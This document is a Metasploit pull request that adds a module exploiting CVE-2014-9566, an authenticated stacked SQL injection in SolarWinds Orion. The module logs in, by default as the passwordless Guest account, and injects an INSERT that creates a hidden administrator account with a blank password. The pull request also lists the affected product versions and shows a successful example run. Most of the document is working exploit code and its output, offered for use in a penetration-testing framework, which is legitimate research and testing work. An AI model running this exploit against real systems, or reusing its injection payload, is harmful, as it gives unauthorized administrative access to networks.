### PR TITLE
Solarwinds Core Orion Service SQL injection (CVE-2014-9566)

### DIFF
--- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb
+++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb
@@ -63,6 +63,10 @@ class Metasploit3 < Msf::Auxiliary
       'cookie' => cookie
     })
 
+    if res.nil?
+      fail_with("Server didn't respond in an expected way")
+    end
+
     if res.code == 200
       fail_with("Authentication failed with username #{username}")
     end

--- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb
+++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http//:metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb
+++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
     cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
     username = Rex::Text.rand_text_alpha(8)
 
-    print_status("Logged in as #{dataastore['USERNAME']}, sending payload to create #{username} admin user.")
+    print_status("Logged in as #{datastore['USERNAME']}, sending payload to create #{username} admin user.")
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'Orion', 'Services', 'AccountManagement.asmx' '/GetAccounts'),

--- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb
+++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation',
+      'Description'    => %q{
+      This module exploits a stacked SQL injection in order to add an administrator user to the
+      SolarWinds Orion database.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Brandon Perry' #discovery/metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-9566']
+        ],
+      'DisclosureDate' => 'Feb 24 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8787),
+        OptString.new('TARGETURI', [ true, "Base Orion directory path", '/']),
+        OptString.new('USERNAME', [true, 'The username to authenticate as', 'Guest']),
+        OptString.new('PASSWORD', [false, 'The password to authenticate with', ''])
+      ], self.class)
+
+  end
+
+  def login (username,password)
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx')
+    })
+
+    viewstate = $1 if res.body =~ /id="__VIEWSTATE" value="(.*)" \/>/
+
+    cookie = res.get_cookies
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        'ctl00$BodyContent$Username' => datastore['USERNAME'],
+        'ctl00$BodyContent$Password' => datastore['PASSWORD']
+      },
+      'cookie' => cookie
+    })
+
+    if res.code == 200
+      fail_with("Authentication failed with username #{username}")
+    end
+
+    return cookie + ';' + res.get_cookies
+  end
+
+  def run
+    cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
+    username = Rex::Text.rand_text_alpha(8)
+
+    print_status("Logged in as #{dataastore['USERNAME']}, sending payload to create #{username} admin user.")
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'Orion', 'Services', 'AccountManagement.asmx' '/GetAccounts'),
+      'method' => 'POST',
+      'vars_get' => {
+        'sort' => 'Accounts.AccountID', #also vulnerable
+        'dir' => "ASC;insert into accounts values ('#{username}', '127-510823478-74417-8', '/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==', 'Feb  1 2100 12:00AM', 'Y', '#{username}', 1, '', '', 1, -1, 8, -1, 4, 0, 0, 0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '', 0, '');"
+      },
+      'data' => '{"accountId":""}',
+      'cookie' => cookie,
+      'ctype' => 'application/json'
+    })
+
+    login(username, '')
+
+    print_good("The injection worked, log in with #{username} and a blank password")
+  end
+end
+

--- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb
+++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb
@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Auxiliary
         '__EVENTTARGET' => '',
         '__EVENTARGUMENT' => '',
         '__VIEWSTATE' => viewstate,
-        'ctl00$BodyContent$Username' => datastore['USERNAME'],
-        'ctl00$BodyContent$Password' => datastore['PASSWORD']
+        'ctl00$BodyContent$Username' => username,
+        'ctl00$BodyContent$Password' => password
       },
       'cookie' => cookie
     })


### PR DESCRIPTION
This pull request adds support for exploiting an authenticated stacked SQL injection within the core Orion service of many Solarwinds products, specifically:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

Any user can be used to exploit this, including the default Guest account (which has no password by default, and is the default user in the module). IIRC Tod should have a vulnerable trial.

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of Feb 24th, 2015 was chosen by both parties.

Example run:

```
bperry@bperry-server:~/tools/brandonprry-metasploit-framework$ ./msfconsole 
[*] Starting the Metasploit Framework console...\

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1405 exploits - 798 auxiliary - 229 post        ]
+ -- --=[ 361 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/gather/solarwinds_orion_sqli 
msf auxiliary(solarwinds_orion_sqli) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf auxiliary(solarwinds_orion_sqli) > show options

Module options (auxiliary/gather/solarwinds_orion_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.105    yes       The target address
   RPORT      8787             yes       The target port
   TARGETURI  /                yes       Base Orion directory path
   USERNAME   Guest            yes       The username to authenticate as
   VHOST                       no        HTTP server virtual host

msf auxiliary(solarwinds_orion_sqli) > run

[*] Logged in as Guest, sending payload to create SlEDesxq admin user.
[+] The injection worked, log in with SlEDesxq and a blank password
[*] Auxiliary module execution completed
msf auxiliary(solarwinds_orion_sqli) > 
```
